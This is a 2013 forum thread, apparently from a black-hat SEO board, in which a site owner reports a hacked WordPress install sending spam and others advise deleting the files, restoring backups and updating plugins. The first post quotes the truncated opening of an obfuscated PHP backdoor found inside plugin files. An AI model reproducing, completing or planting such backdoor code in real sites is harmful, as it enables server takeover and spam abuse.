1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Help, wordpress seems to of been hacked?

Discussion in 'Black Hat SEO' started by djadstar, May 27, 2013.

  1. djadstar

    djadstar Junior Member

    Joined:
    Jan 15, 2013
    Messages:
    135
    Likes Received:
    33
    Ive recieved a message from my hosting about spam emails being sent from my server so i went to check it out. My hosting replied saying it was within 3 plugins. I went to ftp and found a load of random folders with nothing in called like 'desertdentist' and 'equipmentdrama' ive attatched a picture. Whats happened and what the hell was they planning to do? hacked.png
    Inside the plugin file there is 3 .php files which have a load of 'code' in i have no idea what it means its nothing like ive seen before? '?php@error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); if (count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false; foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3'

    Thats just the beggining of it didnt want to post the whole lot. and i seem to of found the answer... there was a html file in there which was named a load of rubbish which was a porn site redirect called 'printersdirect'

    Edit: Also i'd like to add these site were MNS set up by someone from BHW so is this there doing? or someone elses.
     
  2. WPRipper

    WPRipper Supreme Member

    Joined:
    Mar 24, 2010
    Messages:
    1,379
    Likes Received:
    1,493
    Location:
    Proudly romanian
    Ur right, u got hacked. Talk to ur hosting company to erase everything and give you the account like it was when u bought it. I am assuming you have a backup.
     
  3. -Jericho-

    -Jericho- Jr. Executive VIP Jr. VIP Premium Member

    Joined:
    Jan 10, 2010
    Messages:
    2,849
    Likes Received:
    1,704
    Location:
    Stalking My Ex-Wife
    Start deleting those files and plugins. That should hopefully fix your problem. Try reinstalling newer plugins or different plugins. Many times if your plugins are outdated people will find security flaws in them and take advantage of it. I've had it happen before with people putting in viagra links all over my site.

    Run some security plugins to check it too. Your hosting company should be able to help you verify that it has stopped.
     
    • Thanks Thanks x 1
  4. djadstar

    djadstar Junior Member

    Joined:
    Jan 15, 2013
    Messages:
    135
    Likes Received:
    33
    Cheers guys, so strange! i dont really get what they was getting out of it as it didnt redirect to the site they had put in?
     
  5. WPRipper

    WPRipper Supreme Member

    Joined:
    Mar 24, 2010
    Messages:
    1,379
    Likes Received:
    1,493
    Location:
    Proudly romanian
    I think they didnt finished the job.
     
  6. djadstar

    djadstar Junior Member

    Joined:
    Jan 15, 2013
    Messages:
    135
    Likes Received:
    33
  7. Glassy

    Glassy Junior Member

    Joined:
    Mar 7, 2012
    Messages:
    126
    Likes Received:
    14
    It happened to some of my sites too. If you made a backup of it, start over again and install the plugin - limit login attempts, also delete any old plugins that haven't been updated as the hackers can get in that way too.